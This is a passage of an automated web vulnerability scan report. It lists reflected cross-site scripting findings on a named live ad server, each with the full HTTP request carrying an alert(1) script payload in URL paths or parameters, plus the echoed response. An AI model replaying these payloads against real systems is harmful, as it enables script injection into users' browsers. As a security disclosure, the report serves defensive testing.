4.6. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 35919(a)41f172dc609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /ad35919(a)41f172dc609/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 309
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 05:19:58 GMT
Connection: close

unknown path /ad35919(a)41f172dc609/q1.bosherald/ent;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_
...[SNIP]...

4.7. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/ent

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45058<script>alert(1)</script>44ffe6e3b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad45058<script>alert(1)</script>44ffe6e3b74/q1.bosherald/ent HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 74
Date: Sat, 29 Jan 2011 05:19:55 GMT
Connection: close

unknown path /ad45058<script>alert(1)</script>44ffe6e3b74/q1.bosherald/ent

4.8. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5079d(a)499f55b813b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /ad5079d(a)499f55b813b/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 310
Date: Sat, 29 Jan 2011 05:19:58 GMT
Connection: close

unknown path /ad5079d(a)499f55b813b/q1.bosherald/ent_fr;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250
...[SNIP]...

4.9. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aaa75<script>alert(1)</script>881ebad7688 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adaaa75<script>alert(1)</script>881ebad7688/q1.bosherald/ent_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 77
Date: Sat, 29 Jan 2011 05:19:51 GMT
Connection: close

unknown path /adaaa75<script>alert(1)</script>881ebad7688/q1.bosherald/ent_fr

4.10. http://a.collective-media.net/ad/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37e8f<script>alert(1)</script>f4b54c2c5da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad37e8f<script>alert(1)</script>f4b54c2c5da/uol.collective/ColeHaan_MM_Openness_CMN_13109 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 103
Date: Sat, 29 Jan 2011 05:19:56 GMT
Connection: close

unknown path /ad37e8f<script>alert(1)</script>f4b54c2c5da/uol.collective/ColeHaan_MM_Openness_CMN_13109

4.11. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e3e1'-alert(1)-'04a355a249b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.847.CD39C4357e3e1'-alert(1)-'04a355a249b/ATF HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

4.12. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6bfb'-alert(1)-'e42c63df571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.847.CD39C435/ATFc6bfb'-alert(1)-'e42c63df571 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

4.13. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.847.CD39C435/ATF

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bef0'-alert(1)-'1201f78b2ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.847.CD39C435/ATF?3bef0'-alert(1)-'1201f78b2ae=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

4.14. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.847.CD39C435/ATF

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba471'-alert(1)-'37deb8ff8f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.847.CD39C435/ATF;sz=728x90;ord=1296226792127?ba471'-alert(1)-'37deb8ff8f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; dc=dc; nadp=1

Response

4.15. http://a.collective-media.net/adj/cm.quadbostonherald/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadbostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6981'-alert(1)-'6dd5f2ba05c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadbostonheralda6981'-alert(1)-'6dd5f2ba05c/;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.16. http://a.collective-media.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadbostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aee13'-alert(1)-'fb692c92488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadbostonherald/;sz=300x250;ord=[timestamp]?&aee13'-alert(1)-'fb692c92488=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.17. http://a.collective-media.net/adj/cm.quadbostonherald/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadbostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14682'-alert(1)-'6bd835e8910 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadbostonherald/;sz=300x250;ord=[timestamp]?14682'-alert(1)-'6bd835e8910 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.18. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f9f'-alert(1)-'d6411e1a08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_bostonherald82f9f'-alert(1)-'d6411e1a08d/;sz=300x250;ord=0.3579352851957083? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc; apnx=1; blue=1; qcdp=1

Response

4.19. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94cda'-alert(1)-'71a1ddadd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_bostonherald/;sz=300x250;ord=0.3579352851957083?&94cda'-alert(1)-'71a1ddadd2=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc; apnx=1; blue=1; qcdp=1

Response

4.20. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75cbe'-alert(1)-'0e5baadaa09 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_bostonherald/;sz=300x250;ord=0.3579352851957083?75cbe'-alert(1)-'0e5baadaa09 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc; apnx=1; blue=1; qcdp=1

Response

4.21. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98116'-alert(1)-'3c9c0ba56be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.revinet.bostonherald98116'-alert(1)-'3c9c0ba56be/audience;sz=300x250;ord=0.9691057777963579? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

4.22. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd63'-alert(1)-'d2cf8b42732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.revinet.bostonherald/audience8cd63'-alert(1)-'d2cf8b42732;sz=300x250;ord=0.9691057777963579? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

4.23. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.revinet.bostonherald/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6976e'-alert(1)-'f30758ceea3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=0.9691057777963579?&6976e'-alert(1)-'f30758ceea3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

4.24. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e60f'-alert(1)-'5ce6f5d2b63 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

